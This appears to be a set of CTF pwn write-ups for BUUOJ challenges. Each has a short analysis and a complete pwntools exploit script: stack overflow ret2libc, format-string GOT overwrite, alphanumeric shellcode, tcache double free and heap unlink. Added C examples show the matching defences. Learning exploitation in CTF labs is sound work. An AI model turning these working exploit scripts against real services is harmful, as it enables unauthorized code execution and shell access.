mrctf2020_easy_equation

A simple stack overflow plus a format string vulnerability; the stack overflow is what is used here.


axb_2019_fmt64

A classic 64-bit format string vulnerability inside a loop.

The one thing to watch: pwntools' fmtstr_payload does not get a shell here, so the bytes to write have to be computed by hand.

from pwn import *
from LibcSearcher import *

context(log_level='debug', os='linux', arch='amd64')
binary = './axb_2019_fmt64'
r = remote('node4.buuoj.cn', 29901)
#r = process(binary)
elf = ELF(binary)
printf_got = elf.got['printf']
strlen_got = elf.got['strlen']
read_got = elf.got['read']

def leak(payload):
    r.send(payload)
    return r.recv()

r.recvuntil("Please tell me:")
#leak(b'aaaaaaaa.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.'+p64(0)+b'cccccccc')
'''fmt = FmtStr(leak, numbwritten=9)
offset = fmt.offset'''
offset = 8
#gdb.attach(r)
# leak read@GOT through %11$s
r.send(b'aaaaaaaa.%11$sdd'+p64(0)+p64(read_got))
r.recvuntil(b"aaaaaaaa.")
read_addr = u64(r.recv(6).ljust(8, b'\x00'))
libc = LibcSearcher('read', read_addr)
libc_base = read_addr-libc.dump('read')
system = libc_base+libc.dump('system')
sh = libc_base+libc.dump('str_bin_sh')
log.info("read_addr -> "+hex(read_addr))
log.info("system -> "+hex(system))
#payload = fmtstr_payload(6,{strlen_got:system},numbwritten=9,write_size='byte')
# write the low three bytes of system over strlen@GOT by hand:
# one byte (%hhn) at strlen_got+2, then two bytes (%hn) at strlen_got
high = (system & 0xff0000)//0x10000
low = (system & 0xffff)
print(high, low)
payload = '%'+str(high-9)+'c%12$hhn'+'%'+str(low-high)+'c%13$hn'
payload = bytes(payload, encoding='utf-8')+b'c'*(32-len(payload))+p64(strlen_got+2)+p64(strlen_got)
print(payload)
r.send(payload)
r.recvuntil("Please tell me:")
r.send(b';/bin/sh\x00')
r.interactive()

x_ctf_b0verfl0w

Stack overflow with no protections enabled.

from pwn import *
from LibcSearcher import *

context(log_level='debug', os='linux', arch='i386')
binary = './b0verfl0w'
r = remote('node4.buuoj.cn', 29177)
#r = process(binary)
elf = ELF(binary)
main = elf.symbols['main']
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']

r.recvuntil("What's your name?\n")
# leak puts@GOT, then return to main for a second round
payload = b'a'*0x24+p32(puts_plt)+p32(main)+p32(puts_got)
r.sendline(payload)
puts_addr = u32(r.recvuntil(b'\xf7')[-4:])
libc = LibcSearcher('puts', puts_addr)
libc_base = puts_addr-libc.dump('puts')
system = libc_base+libc.dump('system')
sh = libc_base+libc.dump('str_bin_sh')
log.info("puts_addr -> "+hex(puts_addr))
log.info("libc_base -> "+hex(libc_base))
payload2 = b'a'*0x24+p32(system)+p32(main)+p32(sh)
r.sendline(payload2)
r.interactive()

suctf_2018_basic pwn

Another stack overflow.

from pwn import *

context(log_level='debug', os='linux', arch='amd64')
binary = './SUCTF_2018_basic_pwn'
r = remote('node4.buuoj.cn', 27378)
#r = process(binary)
elf = ELF(binary)
binsh = 0x0401157
payload = b'a'*0x118+p64(binsh)
r.sendline(payload)
r.interactive()

mrctf2020_shellcode_revenge

IDA cannot decompile main to pseudo-C for this one, so Cutter was used to disassemble it instead.
NX is not enabled, but there is no stack overflow vulnerability either.

So the next step is to check whether characters other than digits and letters are filtered. A bit of searching turned up alpha3, which fits the bill.

git clone https://github.com/TaQini/alpha3.git

from pwn import *

context(log_level='debug', os='linux', arch='amd64')
binary = './mrctf2020_shellcode_revenge'
r = remote('node4.buuoj.cn', 25264)
#r = process(binary)
elf = ELF(binary)
'''r.recvuntil("Show me your magic!\n")
r.sendline(shellcode)'''
# alphanumeric shellcode produced with alpha3
r.send("Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t")
r.interactive()

ciscn_2019_es_1

Analysis of the main functions

Allocate: allocation function.

Show: print function.

Free: release function, with a UAF vulnerability.

This challenge is fairly simple. The libc is 2.27, so tcache is present, and with the UAF a double free is possible, which gives an arbitrary address write. Full protections are enabled, though, so the GOT cannot be written; __malloc_hook can be, but in practice a one_gadget in __malloc_hook did not yield a shell, so __realloc_hook was tried next, which also failed, and in the end __free_hook was written.

from pwn import *

context(log_level='debug', os='linux', arch='amd64')
binary = './ciscn_2019_es_1'
r = remote('node4.buuoj.cn', 26708)
#r = process(binary)
elf = ELF(binary)
libc = ELF('./libc-2.27.so')

def Allocate(size=0x18, payload='\n'):
    r.sendlineafter("choice:", '1')
    r.sendlineafter("Please input the size of compary's name", str(size))
    r.sendafter("please input name:", payload)
    r.sendafter("please input compary call:", b'/bin/sh\x00')

def Show(index):
    r.sendlineafter("choice:", '2')
    r.sendlineafter("Please input the index:", str(index))

def Free(index):
    r.sendlineafter("choice:", '3')
    r.sendlineafter("Please input the index:", str(index))

Allocate(0x410)  #0
Allocate(0x60)  #1
Allocate()  #2
Free(1)
Free(1)  #double free
Free(0)
Show(0)  # chunk 0 is in the unsorted bin, its fd points into main_arena
main_arena = u64(r.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))-96
libc_base = main_arena-0x10-libc.symbols['__malloc_hook']  #-0x3EBC40
realloc = libc_base+libc.symbols['__libc_realloc']  #+0x98C30
free = libc_base+libc.symbols['__free_hook']  #+0x3ED8E8
one = [0x4f2c5, 0x4f322, 0x10a38c, 0x4f2c5, 0x4f322, 0x10a38c]
log.info("main_arena -> "+hex(main_arena))
log.info("libc_base -> "+hex(libc_base))
log.info("free_hook -> "+hex(free))
Allocate(0x60, p64(free))  #3
Allocate(0x60, p64(free))  #4
Allocate(0x60, p64(one[4]+libc_base))  #5
#gdb.attach(r)
#r.sendlineafter("choice:",'1')
Free(2)
r.interactive()
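The es_1 script works because the binary's Free releases the chunk but leaves the pointer in its table, so the same index can be freed twice and shown afterwards. The C below is an added example, not the challenge's code or the page's: a constructed slot table with the vulnerable Free beside a bookkeeping fix that refuses a second free of the same slot and clears the dangling pointer. The table size, the function names and the sample strings are all assumptions made for the demo.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Toy version of the challenge's object table: a fixed array of slots,
 * each holding a heap pointer (constructed for this example). */
#define SLOTS 8
static char *table[SLOTS];

/* Vulnerable Free: releases the memory but leaves the pointer in the table.
 * A second call on the same index double-frees; a later Show reads freed
 * memory. Kept only for contrast, never called below. */
void free_vulnerable(int idx) {
    free(table[idx]);
}

/* Hardened Free: bounds-check the index, refuse a slot that is already empty,
 * and clear the slot so no dangling pointer survives.
 * Returns 0 when memory was released, -1 when the request was rejected. */
int free_safe(int idx) {
    if (idx < 0 || idx >= SLOTS || table[idx] == NULL) return -1;
    free(table[idx]);
    table[idx] = NULL;
    return 0;
}

/* Allocate into an empty slot; refuses to overwrite a live pointer.
 * Returns 0 on success, -1 otherwise. */
int allocate(int idx, size_t size, const char *name) {
    if (idx < 0 || idx >= SLOTS || table[idx] != NULL || size == 0) return -1;
    table[idx] = malloc(size);
    if (table[idx] == NULL) return -1;
    snprintf(table[idx], size, "%s", name);
    return 0;
}

/* Show returns NULL for freed (cleared) or out-of-range slots instead of
 * handing back stale heap contents. */
const char *show_safe(int idx) {
    if (idx < 0 || idx >= SLOTS) return NULL;
    return table[idx];
}

int main(void) {
    allocate(0, 0x20, "company A");              /* constructed sample */
    printf("slot 0: %s\n", show_safe(0));
    printf("first free: %d\n", free_safe(0));    /* 0: released */
    printf("second free: %d\n", free_safe(0));   /* -1: rejected */
    printf("slot 0 after free: %s\n", show_safe(0) ? show_safe(0) : "(empty)");
    return 0;
}
```

glibc 2.29 and later also store a per-chunk key in freed tcache entries and abort with "free(): double free detected in tcache 2" on an immediate Free(1); Free(1) like the one above; the challenge's 2.27 libc has no such check, which is why the script's double free goes through. The allocator check is a backstop, the actual fix is the bookkeeping in free_safe.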

picoctf_2018_leak_me


简单的泄露!

from pwn import *

context(log_level='debug', os='linux', arch='i386')
binary = './PicoCTF_2018_leak-me'
r = remote("node4.buuoj.cn", 29362)
#r = process(binary)
elf = ELF(binary)
name = 'njh'  #b'a'*0xf8+b'c'*0x8
r.sendlineafter("What is your name?", name)
#r.recvuntil(b"ccccccc,")
#passwd = r.recvline()[:-1]
#r.recvuntil("Please Enter the Password.\n")
sleep(0.1)
r.sendline(b'a_reAllY_s3cuRe_p4s$word_f85406')
r.interactive()

inndy_echo

A simple 32-bit format string vulnerability; pwntools' built-in format string helpers are enough on their own.

from pwn import *

context(log_level='debug', os='linux', arch='i386')
binary = './echo'
r = remote('node4.buuoj.cn', 28025)
#r = process(binary)
elf = ELF(binary)
printf_got = elf.got['printf']
system = elf.symbols['system']

def leak(payload):
    r.sendline(payload)
    return r.recv()

fmt = FmtStr(leak)
offset = fmt.offset  #7
log.warn("offset -> "+str(offset))
payload = fmtstr_payload(offset, {printf_got: system})
r.sendline(payload)
sleep(0.1)
r.sendline(b'/bin/sh\x00')
r.interactive()
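Both format string writeups on this page (axb_2019_fmt64 above and inndy_echo here) rest on the same bug: user input passed to printf as the format argument. The C below is an added example, not code from the page or from either challenge binary. It shows the vulnerable call beside the hardened one, plus a constructed helper, count_conversions, that a program which still has to hand untrusted text to a printf-family function (logging, snprintf wrappers) can use to reject or log strings carrying conversion specifiers. The function names and sample inputs are assumptions for the demo.

```c
#include <stdio.h>
#include <string.h>

/* Vulnerable form: the attacker-controlled buffer is itself the format string,
 * so every '%' in it is interpreted and '%n' turns printf into a memory write.
 * gcc -Wformat-security flags this call; the warning is silenced here only so
 * the contrast compiles. */
#pragma GCC diagnostic push
#pragma GCC diagnostic ignored "-Wformat-security"
#pragma GCC diagnostic ignored "-Wformat-nonliteral"
void echo_vulnerable(const char *user_input) {
    printf(user_input);
}
#pragma GCC diagnostic pop

/* Hardened form: user input only ever travels as a '%s' argument. */
void echo_safe(const char *user_input) {
    printf("%s", user_input);
}

/* Count the conversion specifiers in s. "%%" is a literal percent and is not
 * counted. If has_n is non-NULL it is set to 1 when any %n / %hn / %hhn ...
 * is present (the write primitive format string attacks need).
 * Returns the number of conversions found. */
int count_conversions(const char *s, int *has_n) {
    int count = 0;
    if (has_n) *has_n = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%') continue;
        p++;
        if (*p == '%') continue;        /* "%%" */
        if (*p == '\0') break;          /* trailing lone '%' */
        count++;
        /* skip flags, width, positional "N$", precision and length modifiers */
        while (*p && strchr("-+ #0123456789.$hlLqjzt*", *p)) p++;
        if (*p == '\0') break;
        if (*p == 'n' && has_n) *has_n = 1;
    }
    return count;
}

/* Policy wrapper: 1 if the string may be passed on, 0 otherwise.
 * Echoed text has no business carrying any conversion at all. */
int input_is_clean(const char *s) {
    return count_conversions(s, NULL) == 0;
}

int main(void) {
    /* constructed sample inputs */
    const char *benign = "hello, 100%% sure";
    const char *hostile = "%p.%p.%p.%100c%12$hhn";
    int has_n = 0;
    printf("benign: %d conversions\n", count_conversions(benign, NULL));
    printf("hostile: %d conversions, contains %%n: %d\n",
           count_conversions(hostile, &has_n), has_n);
    if (input_is_clean(benign)) echo_safe(benign);
    putchar('\n');
    return 0;
}
```

Compiling with -D_FORTIFY_SOURCE=2 adds a runtime backstop: glibc's fortified printf aborts when a '%n' appears in a format string that lives in writable memory, which is exactly the situation in both challenges. It does not stop the read-only leaks (%p, %s), so the real fix stays echo_safe.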

hitcontraining_unlink

Analysis of the main functions

Allocate: allocation function; the last byte of the content read in is set to \x00, so there is truncation.

Show: print function, stops at \x00.

Edit: edit function, with a heap overflow vulnerability.

Free: release function, no UAF or similar vulnerability.

This challenge is fairly simple. It is named Unlink, so the unlink technique is used (the binary keeps a global pointer in the .bss section), which gives an arbitrary address write. Here free@GOT is overwritten, but note that free@GOT is adjacent to puts@GOT: the \x00 truncation would corrupt puts@GOT, and with puts@GOT damaged no shell is obtained, so puts@GOT must be preserved.

from pwn import *

context(log_level='debug', os='linux', arch='amd64')
binary = './bamboobox'
r = remote('node4.buuoj.cn', 26559)
#r = process(binary)
elf = ELF(binary)
libc = ELF('./libc.so')
free_got = elf.got['free']
malloc_got = elf.got['malloc']
bss_addr = 0x06020C8

def Allocate(size=0x18, payload='\n'):
    r.sendlineafter("Your choice:", '2')
    r.sendlineafter("Please enter the length of item name:", str(size))
    r.sendafter("Please enter the name of item:", payload)

def Show():
    r.sendlineafter("Your choice:", '1')

def Edit(index, payload):
    r.sendlineafter("Your choice:", '3')
    r.sendlineafter("Please enter the index of item:", str(index))
    r.sendlineafter("Please enter the length of item name:", str(len(payload)))
    r.sendafter("Please enter the new name of the item:", payload)

def Free(index):
    r.sendlineafter("Your choice:", '4')
    r.sendlineafter("Please enter the index of item:", str(index))

def Exit():
    r.sendlineafter("Your choice:", '5')

Allocate(0x80)  #0
Allocate()  #1
Allocate(0x80)  #2
Allocate()  #3
Allocate(0x18, b'/bin/sh\x00')  #4

target = bss_addr
fd = target-0x18
bk = target-0x10
Edit(0, p64(0)+p64(0xa1)+p64(fd)+p64(bk))
Edit(1, b'a'*0x10+p64(0xa0)+p64(0x90))
Free(2)  #Unlink
Allocate(0x70)  #2
Show()
r.recvuntil("1 : ")
main_arena = u64(r.recv(6).ljust(8, b'\x00'))-88
libc_base = main_arena-0x10-libc.symbols['__malloc_hook']  #-0x3C3B20
system = libc_base+libc.symbols['system']  #+0x45380
puts = libc_base+libc.symbols['puts']  #+0x6F5D0
log.info("main_arena -> "+hex(main_arena))
log.warn("libc_base -> "+hex(libc_base))
one = [0x45206, 0x4525a, 0xef9f4, 0xf0897]
# overwrite free@GOT with system and rewrite the adjacent puts@GOT unchanged
Edit(0, b'a'*0x18+p64(target)+b'a'*8+p64(free_got))
#gdb.attach(r)
Edit(1, p64(system)+p64(puts))
Free(4)
r.interactive()
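The unlink step above only works when the allocator trusts a chunk's fd and bk pointers. The C below is an added example, not glibc's code or the page's: a minimal doubly linked node (constructed, not a real malloc_chunk) with the naive unlink beside one that performs the same fd->bk == p && bk->fd == p consistency check glibc's safe-unlink ("corrupted double-linked list") hardening applies. The node layout, helper names and list shapes are assumptions for the demo.

```c
#include <stdio.h>
#include <stddef.h>

/* Minimal doubly linked node, mirroring the fd/bk pair of a free chunk
 * (constructed for this example; not glibc's real malloc_chunk). */
struct node {
    struct node *fd;
    struct node *bk;
};

/* Naive unlink: trusts fd and bk blindly. With attacker-chosen values the two
 * stores become writes to arbitrary addresses, which is the primitive the
 * script above relies on. Kept only for contrast, never called below. */
void unlink_naive(struct node *p) {
    struct node *fd = p->fd, *bk = p->bk;
    fd->bk = bk;
    bk->fd = fd;
}

/* Hardened unlink: both neighbours must point back at p before anything is
 * written. Returns 0 and unlinks on success, -1 (list untouched) if the
 * pointers are inconsistent. */
int unlink_checked(struct node *p) {
    struct node *fd = p->fd, *bk = p->bk;
    if (fd == NULL || bk == NULL || fd->bk != p || bk->fd != p) return -1;
    fd->bk = bk;
    bk->fd = fd;
    return 0;
}

/* Build a circular list head <-> a <-> b <-> head. */
void link3(struct node *head, struct node *a, struct node *b) {
    head->fd = a; a->bk = head;
    a->fd = b;    b->bk = a;
    b->fd = head; head->bk = b;
}

/* Number of nodes after head; only safe on a consistent list. */
int list_length(struct node *head) {
    int n = 0;
    for (struct node *p = head->fd; p != head; p = p->fd) n++;
    return n;
}

int main(void) {
    struct node head, a, b;
    link3(&head, &a, &b);
    printf("before: %d nodes\n", list_length(&head));
    printf("unlink a: %s\n", unlink_checked(&a) == 0 ? "ok" : "rejected");
    printf("after: %d nodes\n", list_length(&head));
    /* constructed corruption: b's fd points at a node that does not point back */
    struct node rogue = {0};
    b.fd = &rogue;
    printf("unlink b with forged fd: %s\n",
           unlink_checked(&b) == 0 ? "ok" : "rejected");
    return 0;
}
```

The check catches random or sloppy corruption, not a precisely forged pair: in the script the fake fd and bk are chosen so that fd->bk and bk->fd both read the global pointer in .bss, so the glibc check passes. That is why the writeup needs the global pointer at all, and why not keeping heap pointers in predictable writable globals (and bounding Edit's length to the chunk size, which is the actual bug here) matters more than the allocator check.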

axb_2019_brop64

A simple 64-bit stack overflow, ret2libc.

from pwn import *
from LibcSearcher import *

context(log_level='debug', os='linux', arch='amd64')
binary = './axb_2019_brop64'
r = remote('node4.buuoj.cn', 26284)
#r = process(binary)
elf = ELF(binary)
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
pop_rdi_ret = 0x0400963
start = 0x04006E0

r.recvuntil("Please tell me:")
# leak puts@GOT, then return to _start for a second round
payload = b'a'*0xd8+p64(pop_rdi_ret)+p64(puts_got)+p64(puts_plt)+p64(start)
r.sendline(payload)
puts_addr = u64(r.recvuntil(b'\n')[-7:-1].ljust(8, b'\x00'))
libc = LibcSearcher('puts', puts_addr)
libc_base = puts_addr-libc.dump('puts')
system = libc_base+libc.dump('system')
sh = libc_base+libc.dump('str_bin_sh')
log.warn("puts_addr -> "+hex(puts_addr))
payload2 = b'a'*0xd8+p64(pop_rdi_ret)+p64(sh)+p64(system)+p64(start)
r.sendline(payload2)
r.interactive()
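The three plain stack overflows on this page (b0verfl0w, SUCTF_2018_basic_pwn and axb_2019_brop64) all come down to a fixed-size stack buffer filled by an unbounded read, with the padding lengths 0x24, 0x118 and 0xd8 being the distance from that buffer to the saved return address. The C below is an added example, not code from any of the challenge binaries or from the page: the vulnerable copy beside a bounded one that rejects oversized input outright instead of silently truncating it. Buffer size, function names and sample inputs are assumptions for the demo.

```c
#include <stdio.h>
#include <string.h>

#define NAME_CAP 32   /* constructed buffer size for the demo */

/* Vulnerable pattern, as in the challenges above: fixed-size stack buffer,
 * unbounded copy. Anything past NAME_CAP bytes lands on the saved frame
 * pointer and return address. Kept only for contrast, never called below. */
void greet_vulnerable(const char *src) {
    char name[NAME_CAP];
    strcpy(name, src);
    printf("Hello, %s\n", name);
}

/* Bounded copy with an explicit verdict. Returns 0 on success and -1 if src
 * does not fit (dst is left untouched in that case). strnlen never scans
 * further than dstsz, so an unterminated src cannot cause an over-read. */
int copy_name_bounded(char *dst, size_t dstsz, const char *src) {
    size_t n = strnlen(src, dstsz);
    if (n >= dstsz) return -1;
    memcpy(dst, src, n);
    dst[n] = '\0';
    return 0;
}

/* Hardened greeting: same stack buffer, but the input is refused when it is
 * too long rather than allowed to overflow or be silently cut. */
int greet_safe(const char *src) {
    char name[NAME_CAP];
    if (copy_name_bounded(name, sizeof name, src) != 0) {
        fputs("name too long\n", stderr);
        return -1;
    }
    printf("Hello, %s\n", name);
    return 0;
}

int main(void) {
    char big[64];                       /* constructed over-long input */
    memset(big, 'a', sizeof big - 1);
    big[sizeof big - 1] = '\0';
    printf("short name: %d\n", greet_safe("alice"));   /* 0 */
    printf("long name: %d\n", greet_safe(big));        /* -1 */
    return 0;
}
```

Rejecting instead of truncating matters because a silent cut-off of attacker data produces its own bugs (the \x00 truncation issue in the unlink challenge above is one example); the length check also keeps the program correct whether or not the binary was built with -fstack-protector and NX, which only turn a successful overflow into a crash.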
